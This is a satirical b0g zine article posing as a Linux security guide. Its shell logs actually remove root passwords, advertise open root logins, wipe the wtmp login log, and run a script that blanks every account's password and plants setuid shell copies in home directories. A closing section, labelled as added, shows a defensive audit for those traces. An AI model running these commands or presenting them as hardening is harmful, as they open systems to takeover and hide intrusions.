



 ____________________________________________________________________
 
[13:. - [ How to NOT get owned by Prae ]                 [timidu] :. ]
                                                 [timidu@b0g.org] :. ]
 ____________________________________________________________________









"-My fucking GOD! I've been hacked by Prae!@#$@#$# ! I wanna kill
myself ! >:/"
You can hear that pretty often these days as Prae is a 31337 h4x0r
and he'll root you in just a second.
This guide is meant to help Linux and Internet newbies to avoid not
getting hacked by this hack-est , the Emperor of the Hackers , the guy
that can root you with only a spoon and a peach-leaf , his Majesty
Prae from b0g. Here is a log of what I do every time I reinstall
Linux on my box that was NEVER hacked by Prae (and will never be as I
IRC spoofed cuz I'm lame).
Following these lines step by step will totally secure you and Prae
won't , for sure , root you.



Mandrake Linux release 7.0 (Air)
Kernel 2.4.0-test2 on a i386

sekurebox login: root
Password:
Last login: Sun Jun 25 20:07:24 on tty4
You have mail.
[root@sekurebox /root]# passwd -d root
Changing password for user root
Removing password for user root
passwd: Success
[root@sekurebox /root]# echo 'Enter root login and enjoy!@@#$@' >
/etc/issue.net
[root@sekurebox /root]# echo 'Enter root login and enjoy!@@#$@' >
/etc/issue
[root@sekurebox /root]# logout

Enter root login and enjoy!@#@#$
sekurebox login: root
Last login: Tue Jun 27 16:43:54 on tty1
You have mail.
[root@sekurebox /root]# echo 'This box has no root password set
'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set
'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set
'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set' >>
/home/httpd/html/index.htm
[root@sekurebox /root]# mail -s "Telnet over here" prae@b0g.org
hey .. check out my box man
Cc: ^D[root@sekurebox /root]#
[root@sekurebox /root]# BitchX -c #k-rad -n TelnetMe
toronto.on.ca.undernet.org&
[1] 764
[root@sekurebox /root]# BitchX - Based on EPIC Software Labs epic
ircII
(1998).
Version (BitchX-1.0c16) -- Date (19990221).
Process [764]
Using terminal type [linux]


[1]+  Stopped (tty output)    BitchX -c #k-rad -n TelnetMe
toronto.on.ca.undernet.org
[root@sekurebox /root]# rm -f /var/log/wtmp
[root@sekurebox /root]# touch /var/log/wtmp
[root@sekurebox /root]# last root

wtmp begins Tue Jun 27 19:07:27 2000
[root@sekurebox /root]# sleep 360000


Meanwhile .. on Prae's box

[root@PraeScilla /root]#
Message from mom@kitchen on tty4 at 19:10 ...
Prae , pumpkin , it's dinner time
EOF

[root@PraeScilla /root]# echo "But Im not hungry , mommy!" | write
mom
[root@PraeScilla /root]#
Message from mom@kitchen on tty4 at 19:14 ...
Hmm .. I thought you learnt your lesson the other day when I hit you
with the brand new whip that i've purchased
EOF
[root@PraeScilla /root]# echo "Ok , mom , pls not the whip again , Im
comin' in 5 mins ; just lemme read my e-mails" | write mom

[root@PraeScilla /root]# ssh -l prae b0g.org
prae@b0g.org's password:            (what could it be?)
Last login: XXXXXXXXXXXXXXXXX
You have new mail.

[prae@b0g ~]$ cat $MAIL


>From root@sekurebox.net  Tue Jun 27 16:50:58 2000
Return-Path: 
Received: (from root@sekurebox.net)
        by sekurebox.net (8.9.3/8.9.3) id QAA00740
        for prae@b0g.org; Tue, 27 Jun 2000 16:50:58 -0400
Date: Tue, 27 Jun 2000 16:50:58 -0400
From: root 
Message-Id: <200006272050.QAA00740@sekurebox.net>
To: prae@b0g.org
Subject: Telnet over here
Status: RO
X-Status:
X-Keywords:
X-UID: 2

hey .. check out my box man

[prae@b0g ~]$ HaHaHaH .. I ROOT YOUR BOX .. YOU LAMER!#$@$%@%$
bash: HaHaHaH: command not found
[prae@b0g ~]$ 8u7 Wh47 7H3 fuq 15 7h15 b0x
bash: 8u7: command not found
[prae@b0g ~]$ cat $MAIL | grep 'Subject' | awk -F':' '{print $2}'
 Telnet over here

[prae@b0g ~]$ ahhhh
bash: ahhhh: command not found
[prae@b0g ~]$ telnet
telnet> over here
?Invalid command
telnet> open over here
over: Host name lookup failure
telnet> quit
[prae@b0g ~]$ BOY , I SUCK!!!!!!!!!!! :((((((((((
BOY , I SUCK!!!!!! :((((((((((
bash: syntax error near unexpected token `:(('
[prae@b0g ~]$ logout

[root@PraeScilla /root]# su learntime
[learntime@PraeScilla ~]$ mesg n
[learntime@PraeScilla ~]$ less `locate script-kiddy-HOWTO` && lynx
www.antionline.com && lynx www.2600.org && BitchX -c #hack
toronto.on.ca.undernet.org
[learntime@PraeScilla ~]$ su -
Password:
[root@PraeScilla /root]#
[root@PraeScilla /root]#
[root@PraeScilla /root]#
[root@PraeScilla /root]# /sbin/lilo -D=dos
[root@PraeScilla /root]# adios , dear Linux , but Im too lame to use
you
>
[root@PraeScilla /root]# reboot


This won't really happen (at least I'm not sure about it) but you can
check yer logz to see that Prae didn't penetrate you (your system , I
mean , I don't know if he actually penetrated you ;)


[root@sekurebox /root]# last root

wtmp begins Tue Jun 27 19:07:27 2000

See? You're totally safe!@#$@ Thank me! Praise me! Cherish me!@#$@#



These are just a few methods of protecting yourself. You can increase
security in many ways ....
I usually make this cool script
--- cut here ---
#!/bin/bash
for I in `cat /etc/passwd | awk -F':' '{print $1}'`
do
passwd -d $I
cp /bin/bash /home/$i
chmod a+s /home/$i/bash
echo "./bash" >> /home/$i/.bash_profile
done
--- stop cutting ---
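
To check a box for what the script above leaves behind (empty password fields and setuid copies of a shell under /home), here is an added example that is not part of the original article. The function names, account names and fixture files are made up for illustration; point the two audit functions at /etc/shadow and /home as root to check a real system.

```shell
#!/bin/sh
# Added example (not from the original article): audit for the two things the
# "cool script" above leaves behind. Function names and fixture are hypothetical.

# Accounts whose password field (2nd colon-separated field) is empty,
# which is the state `passwd -d` leaves in a shadow-format file.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Regular files under a directory tree that carry the setuid or setgid bit.
setid_files_under() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Build a constructed fixture so the audit can be run offline.
make_fixture() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/home/alice" "$d/home/bob"
    printf '%s\n' \
        'root::11135:0:99999:7:::' \
        'alice:$1$CONSTRUCTED$notarealhash:11135:0:99999:7:::' \
        'bob:!!:11135:0:99999:7:::' > "$d/shadow"
    : > "$d/home/alice/bash"          # stand-in for a copied shell
    chmod 4755 "$d/home/alice/bash"   # setuid bit, as chmod a+s would set
    : > "$d/home/bob/notes.txt"       # ordinary file, must not be reported
    echo "$d"
}

# Demo run against the constructed fixture only.
demo=$(make_fixture)
echo "empty password field: $(empty_password_accounts "$demo/shadow")"
echo "setuid/setgid files:  $(setid_files_under "$demo/home")"
rm -rf "$demo"
```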



If you find this guide useful then I'll continue releasing this
invaluable advice that every admin should follow.





b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!



